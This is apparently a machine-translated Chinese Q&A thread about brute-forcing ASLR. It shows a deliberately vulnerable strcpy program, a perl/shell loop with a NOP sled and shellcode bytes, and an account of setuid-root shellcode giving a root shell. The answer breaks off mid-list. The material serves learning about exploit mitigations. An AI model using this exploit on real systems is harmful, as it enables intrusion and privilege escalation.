我刚刚阅读了有关地址空间布局随机化的内容,我尝试了一个非常简单的脚本来尝试强制它。这是我用来测试一些东西的程序。
#include <stdio.h>
#include <string.h>
int main (int argc, char **argv)
{
char buf[8];
printf("&buf = %p\n", buf);
if (argc > 1 && strcpy(buf, argv[1]));
return 0;
}
我用这个命令编译它:
gcc -g -fno-stack-protector -o vul vul.c
我确保启用了ASLR:
$ sysctl kernel.randomize_va_space
kernel.randomize_va_space = 2
然后,我想出了这个简单的脚本:
str=`perl -e 'print "\x40\xfa\xbb\xbf"x10 \
. "\x90"x65536 \
. "\x31\xc0\x40\x89\xc3\xcd\x80"'`
while [ $? -ne 1 ]; do
./vul $str
done
格式为
return address many times | 64KB NOP slide | shellcode that runs exit(1)
运行此脚本几秒后,它会以我想要的错误代码1退出。我也尝试过调用execv的其他shellcode(“/ bin / sh”,...),我也成功了。
我觉得奇怪的是,即使在返回地址之后也可以创建如此长的NOP幻灯片。我认为ASLR更有效,我错过了什么吗?是因为地址空间太小了吗?
编辑:我做了一些额外的研究,这是我发现的:
我要求朋友在他的64b计算机上使用-m32 -z execstack运行此代码,稍后更改返回地址后,他的结果相同。
即使我没有使用-z execstack,我也设法执行了shellcode。我通过使用不同的shell代码确保了这一点,这些代码都完成了他们应该做的事情(即使是众所周知的方案chown root ./vul,chmod +s ./vul,运行setreuid(0, 0)然后execv("/bin/sh", ...)的shellcode最后在生成的shell中返回'root'的whoami。
这很奇怪,因为execstack -q ./vul告诉我可执行堆栈标志位未设置。有谁知道为什么?
答案 0 :(得分:1)
首先,我有点惊讶你不需要将选项-z execstack传递给编译器来获取shellcode来执行exit(1)。
此外,我猜你是在32位机器上,因为你没有将选项-m32传递给gcc以获得32位代码。
最后,我确实没有成功运行你的程序(我等了几秒钟)。
所以,我对你的结论有点怀疑(除非你运行一个非常特殊的Linux系统或者可能是幸运的。)
无论如何,有两件事你还没有提到:
您可以查看ASLR维基百科页面上的“ASLR Effectiveness”部分。